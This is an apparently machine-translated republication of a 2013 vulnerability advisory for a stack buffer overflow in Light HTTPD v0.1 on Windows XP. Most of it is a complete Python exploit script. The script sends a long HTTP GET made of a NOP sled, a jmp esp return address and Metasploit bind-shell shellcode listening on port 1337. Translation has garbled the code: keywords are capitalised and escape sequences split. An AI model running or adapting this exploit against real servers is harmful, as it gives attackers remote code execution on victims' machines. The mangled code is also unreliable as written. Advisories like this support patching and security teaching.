Light HTTPD Stack Buffer Overflow Vulnerability

Source: Internet
Author: User

Release date:
Updated on: 2013-04-27

Affected Systems:
Light HTTPD Light httpd0.1
Description:
--------------------------------------------------------------------------------
Bugtraq id: 59495
 
Light HTTPD is a project to improve ghttpd to include server-parsed elements, htaccess, content management, and on-page MySQL queries.
 
Light HTTPD has a buffer overflow vulnerability. Successful exploitation of this vulnerability can cause arbitrary code execution in application context or dos.
 
<* Source: Jacob Holcomb
*>

Test method:
--------------------------------------------------------------------------------

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
Import urllib2
From time import sleep

######################################## ######################################## ######################################## #################
# Title ************************ Windows Light HTTPD v0.1 http get Buffer Overflow
# Discovered and Reported ****** 24th of each L, 2013
# Discovered/Exploited By ****** Jacob Holcomb/Gimppy042
# Software Vendor **************** http://sourceforge.net/projects/lhttpd? Source = navbar
# Exploit/Advisory ************** http://infosec42.blogspot.com/
# Software ********************** Light HTTPD v0.1
# Tested Platform *************** Windows XP Professional SP2
# Date ************************* 24/04/2013
#
# PS-This is a good piece of software to practice Stack Based Buffer Overflows if you curiouz and want to learnz
######################################## ######################################## ######################################## #################
# Exploit-DB Note: Offset 255 for Windows XP SP3
# Jmp esp ntdll 0x7c31fcd8
# Payload = "\ x90" * 255 + "\ xd8 \ xfc \ x91 \ x7c" + "\ x90" * 32 + shellcode

Def targURL ():

While True:

URL = raw_input ("\ n [*] Please enter the URL of the Light HTTP server you wowould like to PWN. Ex. http: // 192.168.1.1 \ n> ")
If len (URL )! = 0 and URL [0: 7] = "http ://":
Break

Else:
Print "\ n [!] Target URL cant be null and must contain http: // or https: // [!] \ N"
Sleep (1)

Return str (URL)


Def main ():

Target = targURL ()
# Msfpayload windows/shell_bind_tcp EXITFUNC = thread LPORT = 1337 R | msfencode-c 1-e x86/shikata_ga_nai-B "\ x00 \ x0a \ x0d \ xff \ x20" R
Shellcode = "\ xb8 \ x3b \ xaf \ xc1 \ x8a \ xdb \ xcd \ xd9 \ x74 \ x24 \ xf4 \ x5a \ x29 \ xc9"
Shellcode + = "\ xb1 \ x56 \ x83 \ xc2 \ x04 \ x31 \ x42 \ x0f \ x03 \ x42 \ x34 \ x4d \ x34 \ x76"
Shellcode + = "\ xa2 \ x18 \ xb7 \ x87 \ x32 \ x7b \ x31 \ x62 \ x03 \ xa9 \ x25 \ xe6 \ x31 \ x7d"
Shellcode + = "\ x2d \ xaa \ xb9 \ xf6 \ x63 \ x5f \ x4a \ x7a \ xac \ x50 \ xfb \ x31 \ x8a \ x5f"
Shellcode + = "\ xfc \ xf7 \ x12 \ x33 \ x3e \ x99 \ xee \ x4e \ x12 \ x79 \ xce \ x80 \ x67 \ x78"
Shellcode + = "\ x17 \ xfc \ x87 \ x28 \ xc0 \ x8a \ x35 \ xdd \ x65 \ xce \ x85 \ xdc \ xa9 \ x44"
Shellcode + = "\ xb5 \ xa6 \ xcc \ x9b \ x41 \ x1d \ xce \ xcb \ xf9 \ x2a \ x98 \ xf3 \ x72 \ x74"
Shellcode + = "\ x39 \ x05 \ x57 \ x66 \ x05 \ x4c \ xdc \ x5d \ xfd \ x4f \ x34 \ xac \ xfe \ x61"
Shellcode + = "\ x78 \ x63 \ xc1 \ x4d \ x75 \ x7d \ x05 \ x69 \ x65 \ x08 \ x7d \ x89 \ x18 \ x0b"
Shellcode + = "\ x46 \ xf3 \ xc6 \ x9e \ x5b \ x53 \ x8d \ x39 \ xb8 \ x65 \ x42 \ xdf \ x4b \ x69"
Shellcode + = "\ x2f \ xab \ x14 \ x6e \ xae \ x78 \ x2f \ x8a \ x3b \ x7f \ xe0 \ x1a \ x7f \ xa4"
Shellcode + = "\ x24 \ x46 \ x24 \ xc5 \ x7d \ x22 \ x8b \ xfa \ x9e \ x8a \ x74 \ x5f \ xd4 \ x39"
Shellcode + = "\ x61 \ xd9 \ xb7 \ x55 \ x46 \ xd4 \ x47 \ xa6 \ xc0 \ x6f \ x3b \ x94 \ x4f \ xc4"
Shellcode + = "\ xd3 \ x94 \ x18 \ xc2 \ x24 \ xda \ x33 \ xb2 \ xbb \ x25 \ xbb \ xc3 \ x92 \ xe1"
Shellcode + = "\ xef \ x93 \ x8c \ xc0 \ x8f \ x7f \ x4d \ xec \ x5a \ x2f \ x1d \ x42 \ x34 \ x90"
Shellcode + = "\ xcd \ x22 \ xe4 \ x78 \ x04 \ xad \ xdb \ x99 \ x27 \ x67 \ x6a \ x9e \ xe9 \ x53"
Shellcode + = "\ x3f \ x49 \ x08 \ x64 \ xba \ xb0 \ x85 \ x82 \ xae \ xd2 \ xc3 \ x1d \ x46 \ x11"
Shellcode + = "\ x30 \ x96 \ xf1 \ x6a \ x12 \ x8a \ xaa \ xfc \ x2a \ xc4 \ x6c \ x02 \ xab \ xc2"
Shellcode + = "\ xdf \ xaf \ x03 \ x85 \ xab \ xa3 \ x97 \ xb4 \ xac \ xe9 \ xbf \ x95 \ x7a"
Shellcode + = "\ x35 \ xae \ x54 \ x1a \ x4a \ xfb \ x0e \ xbf \ xd9 \ x60 \ xce \ xb6 \ xc1 \ x3e"
Shellcode + = "\ x99 \ x9f \ x34 \ x37 \ x4f \ x32 \ x6e \ xe1 \ x6d \ xcf \ xf6 \ xca \ x35 \ x14"
Shellcode + = "\ xcb \ xd5 \ xb4 \ xd9 \ x77 \ xf2 \ xa6 \ x27 \ x77 \ xbe \ x92 \ xf7 \ x2e \ x68"
Shellcode + = "\ x4c \ xbe \ x98 \ xda \ x26 \ x68 \ x76 \ xb5 \ xae \ xed \ xb4 \ x06 \ xa8 \ xf1"
Shellcode + = "\ x90 \ xf0 \ x54 \ x43 \ x4d \ x45 \ x6b \ x6c \ x19 \ x41 \ x14 \ x90 \ xb9 \ xae"
Shellcode + = "\ xcf \ x10 \ xd9 \ x4c \ xc5 \ x6c \ x72 \ xc9 \ x8c \ xcc \ x1f \ xea \ x7b \ x12"
Shellcode + = "\ x26 \ x69 \ x89 \ xeb \ xdd \ x71 \ xf8 \ xee \ x9a \ x35 \ x11 \ x83 \ xb3 \ xd3"
Shellcode + = "\ x15 \ x30 \ xb3 \ xf1"

# 7C941EED FFE4 jmp esp ntdll. dll
Payload = "\ x90" * 258 + "\ xED \ x1E \ x94 \ x7C" + "\ x90" * 32 + shellcode
Port = ": 3000 /"
Sploit = target + port + payload

Try:
Print "\ n [*] Preparing to send edevil PAYLoAd to % s! \ N [*] Payload Length: % d \ n [*] Waiting... "% (target [7:], len (sploit ))
HttpRequest = urllib2.Request (sploit)
Sploit = urllib2.urlopen (httpRequest, None, 6)
Failed T (urllib2.URLError ):
Print "\ n [!] Error. Please check that the Light HTTP Server is online [!] \ N"
Except t:
Print "\ n [!] The server did not respond, but the payload was sent. F! Ng3r $ Cr0 $ 3d 4 c0d3 Ex3cut! 0n! [!] \ N"



If _ name _ = "_ main __":
Main ()

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
 
Light HTTPD
-----------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:
 
Http://sourceforge.net/projects/lhttpd? Source = navbar

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.